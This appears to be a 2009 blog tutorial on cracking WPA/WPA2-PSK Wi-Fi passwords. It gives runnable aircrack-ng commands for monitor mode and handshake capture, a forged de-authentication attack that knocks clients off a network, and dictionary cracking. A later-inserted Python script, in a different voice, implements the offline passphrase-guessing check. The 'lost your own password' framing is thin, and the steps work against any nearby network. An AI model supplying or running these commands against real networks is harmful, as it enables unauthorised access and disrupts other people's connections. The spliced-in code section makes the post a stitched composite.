Tuesday, June 9, 2009

How to Hack WPA

This is meant for security purposes, for example if you have lost your own router's password. I DO NOT TAKE ANY RESPONSIBILITY FOR ANYTHING THAT HAPPENS AFTER READING THIS GUIDE, ok... This is a good one, let me tell you! There can be many issues in setting up your box to actually get the tools working, and I'm not even touching on that, but if you can get everything to work, you'll be cracking wireless networks like a pro in no time.

Tools
******
I've been really, really successful with basically one tool set, called Aircrack-ng (the airmon-ng, airodump-ng, aireplay-ng and aircrack-ng commands used below). Download that.

Kismet is an excellent tool for sniffing out wireless networks as well and could prove useful. It can be downloaded here.

NetStumbler is a Windows-based wireless tool that detects wireless networks and marks their relative position with a GPS. NetStumbler sends an 802.11 Probe Request to the broadcast destination address, which causes all access points in the area to issue an 802.11 Probe Response containing network configuration information such as their SSID and WEP status. When hooked up to a GPS, NetStumbler records the GPS coordinate of the highest signal strength found for each access point. It can be found here.

An encrypted wireless network. This guide works through WPA and WPA2 networks that use a static passkey (WPA-PSK, also called WPA-Personal). WEP is a different and easier attack and is not walked through below.

Note: Make sure you can get your card into monitor mode (sometimes called raw monitor or rfmon). This is VERY important: without monitor mode the card only sees traffic addressed to itself, so airodump-ng cannot capture another client's handshake and none of the steps below will work.

WPA is a security protocol that takes care of most of the vulnerabilities inherent in WEP. WEP is, by design, flawed. No matter how good or crappy, long or short, your WEP key is, it can be cracked. WPA is different. A WPA key can be made good enough to make cracking it unfeasible. On the other hand, WPA is a little more cracker friendly in one respect: by capturing the right packets (a client's authentication handshake), you can do your cracking offline. This means you only have to be near the AP for a matter of seconds to get what you need. Advantages and disadvantages.

WPA basically comes in two flavours: RADIUS (WPA-Enterprise, 802.1X with per-user credentials) or PSK (a single pre-shared passphrase). PSK is crackable; RADIUS is not so much, because there is no shared passphrase to guess.
PSK uses a user-defined passphrase. The passphrase is stretched (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 rounds) into the Pairwise Master Key (PMK); from the PMK, the two MAC addresses and two random nonces, the AP and client derive the per-session Pairwise Transient Key (PTK) during the 4-way handshake, and that is what initializes TKIP (temporal key integrity protocol) or CCMP. There is a password and the user is involved, and for the most part that means it is flawed. TKIP itself is not really crackable, since it uses per-packet keys, but the handshake that sets it up is the weak point. Note that the handshake does not carry the password, nor the PMK; what it carries is the nonces, the MACs and a MIC keyed by part of the PTK, which is everything you need to check a guessed passphrase. This is why it differs from WEP: in WEP cracking you recover the key directly from enough captured IVs, no client needed. In WPA/WPA2 you need to capture the handshake, which means you need to wait for someone to successfully join the network using the password; aircrack-ng then grabs the handshake from the capture and tests candidate passphrases against it offline.

First you need to bring down your wireless interface so you can modify it. Mine is rausb0, so I would type 'ifconfig rausb0 down'.

Then reload the driver for the card (mine is the rt73 USB driver), which resets its state:

- modprobe -r rt73
- modprobe rt73

Bring the wireless interface back up

- ifconfig rausb0 up

Change the rate of the wireless interface to 1M. This helps a lot but is not required; it does solve some other problems you would encounter if you don't do this.

- iwconfig rausb0 rate 1M

Bring rausb0 into monitor mode

- airmon-ng start rausb0

(On newer drivers airmon-ng creates a separate monitor interface, such as mon0 or wlan0mon, and prints its name; if it does, use that interface name instead of rausb0 in all of the following commands.)

Look for your network. I am doing this at my own house, with another computer on the LAN, thus I know exactly what I am looking for.

Type the following command into a terminal to start monitoring the network(s).

- airodump-ng rausb0

This command lists the networks around you: their MAC addresses (BSSID), their network names (ESSID), the channel, and their security method/encryption type (WPA, WPA2, WEP, or OPN for open; we are looking for WPA or WPA2). Here is a screenshot of what you should see; it won't be exact, obviously, because you aren't in my house.

See the MAC 00:00:00:00:00:F1? That's my network! Once you see the network you are looking for, hit Ctrl+C to stop the scan so you can copy the MAC.

NOTE: In the station list below the networks, you can see that MAC address 00:00:00:00:00:01 is associated with AP 00:00:00:00:00:F1. That is the other wireless laptop on the network. You can view all client connections this way. For WPA you will need to intercept a client's authentication, so you need at least one client like this to watch or to kick off.

Now focus on the AP you are looking at and capture its packets (leave this running and open a new terminal for the further commands). Type the following command:

- airodump-ng -c 1 -w psk --bssid 00:00:00:00:00:F1 rausb0

where -c 1 locks the card to channel 1 (the channel airodump-ng showed for the AP), -w psk is the prefix of the file the data is written to (airodump-ng appends a sequence number, so the first capture is psk-01.cap), and --bssid is the MAC of the AP.

This is the tough part. You need to either wait for someone to connect to the network and type the password, or run a de-authentication attack against a client that is already connected so that it reconnects.

I have tried a de-authentication attack, but it seems my wireless card is unable to do so (it needs a driver that supports packet injection). To try it, this is the command:

- aireplay-ng -0 <count> -a <AP MAC> -c <client MAC> <interface>

So if I were to try it with 1 deauth burst (you can use 10, or 0 for unlimited, whatever you want), against the AP 00:00:00:00:00:F1 and the client 00:00:00:00:00:01, it would look like this:

- aireplay-ng -0 1 -a 00:00:00:00:00:F1 -c 00:00:00:00:00:01 rausb0

What this does is send forged de-authentication frames, which are unauthenticated in WPA/WPA2 (unless the network uses 802.11w management frame protection), to kick the client off the network. The client's driver rejoins automatically, and that rejoin is where you capture the HANDSHAKE.

Once you see "WPA handshake: 00:00:00:00:00:F1" in the upper right of the airodump-ng window, you have successfully captured a handshake, which means a client joined (or rejoined) the network while you were monitoring it. What you captured is not the password itself, encrypted or otherwise, but the nonces and the keyed MIC that let you verify password guesses offline.

Cracking the password. You will need a password list, and a good one too, since a WPA-PSK passphrase can only be recovered by guessing it. Here is the cool thing: you are not actually trying to join the network with your passwords. For each candidate in your list, aircrack-ng derives the keys exactly the way the client did from the captured handshake, computes the MIC, and compares it with the MIC in the capture; a match means that candidate is the passphrase.

Remember earlier we named the capture file prefix 'psk'? Alright, just making sure, because you are going to need whatever name you chose (the name itself doesn't matter).
Type the following command into your terminal:

- aircrack-ng -w passwordlist.txt filename*.cap

So my password list is called english.txt and my prefix is psk, thus I run aircrack-ng -w english.txt psk*.cap. (I add a * after psk because airodump-ng appends a number, so the real file name is psk-01.cap. If the capture contains more than one network, add -b 00:00:00:00:00:F1 to select the AP.)
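To make concrete what "encrypting the passwords in your list the same way the handshake is encrypted" means, and the PSK explanation earlier about the handshake carrying only nonces and a MIC, here is an added Python example. It is not part of the original post and is not aircrack-ng's own code. It builds a handshake message 2 for a constructed network (SSID "IEEE" and passphrase "password", which is the PBKDF2 test vector published in IEEE 802.11i; the MACs are the placeholder addresses from this post; the nonces and the RSN element are made up) and then runs the same offline check aircrack-ng does: passphrase -> PMK (PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds) -> PTK (PRF-512 over the MACs and nonces) -> MIC over the EAPOL-Key frame, compared against the MIC in the capture. Pulling the nonces, MACs and EAPOL frame out of a real psk-01.cap is what airodump-ng/aircrack-ng do for you and is not shown here.

```python
import hashlib
import hmac
import struct

# Constructed handshake parameters (not from the original post).
SSID = "IEEE"                                # IEEE 802.11i PBKDF2 test vector SSID
AP_MAC = bytes.fromhex("0000000000f1")       # 00:00:00:00:00:F1, the AP from the post
CLIENT_MAC = bytes.fromhex("000000000001")   # 00:00:00:00:00:01, the client from the post
ANONCE = hashlib.sha256(b"constructed ANonce").digest()  # 32-byte nonce, made up
SNONCE = hashlib.sha256(b"constructed SNonce").digest()  # 32-byte nonce, made up
# RSN information element (CCMP pairwise/group, PSK AKM) a client puts in message 2
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """Passphrase -> PMK: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field (bytes 81..96) zeroed.

    Key Descriptor Version (low 3 bits of Key Information, bytes 5..6):
    1 = WPA/TKIP, HMAC-MD5;  2 = WPA2/CCMP, HMAC-SHA1 truncated to 128 bits.
    """
    version = struct.unpack(">H", eapol[5:7])[0] & 0x7
    zeroed = eapol[:81] + b"\x00" * 16 + eapol[97:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def client_message2(passphrase: str, key_version: int = 2) -> bytes:
    """Simulate the client's handshake message 2: SNonce plus a MIC keyed by the KCK."""
    desc_type = 0x02 if key_version == 2 else 0xFE     # RSN (WPA2) or legacy WPA descriptor
    key_info = 0x0108 | key_version                    # Pairwise + MIC bits, descriptor version
    body = (struct.pack(">BHH", desc_type, key_info, 0)  # descriptor, key info, key length
            + struct.pack(">Q", 1)                       # replay counter
            + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
            + b"\x00" * 16                               # MIC, filled in below
            + struct.pack(">H", len(RSN_IE)) + RSN_IE)   # key data length, key data
    eapol = struct.pack(">BBH", 1, 3, len(body)) + body  # EAPOL v1, type 3 = EAPOL-Key
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]  # KCK = PTK[0:16]
    return eapol[:81] + eapol_mic(kck, eapol) + eapol[97:]


def crack_psk(wordlist, eapol: bytes, ssid: str = SSID, ap_mac: bytes = AP_MAC,
              client_mac: bytes = CLIENT_MAC, anonce: bytes = ANONCE,
              snonce: bytes = SNONCE):
    """The offline check: derive PMK/PTK for each candidate and compare MICs.

    Returns the matching passphrase, or None if the wordlist does not contain it.
    """
    captured_mic = eapol[81:97]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    captured = client_message2("password")        # what airodump-ng would have recorded
    print("recovered:", crack_psk(["letmein", "qwerty", "password"], captured))
```

Nothing in the handshake decrypts to the passphrase; a guess can only be confirmed or rejected, and each guess costs 4096 HMAC-SHA1 rounds for the PMK alone, which is why the attack is only as good as the wordlist.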

That's about it.

2 comments:

  1. If I may ask, what dictionary file are you looking for, so that we could help you out...
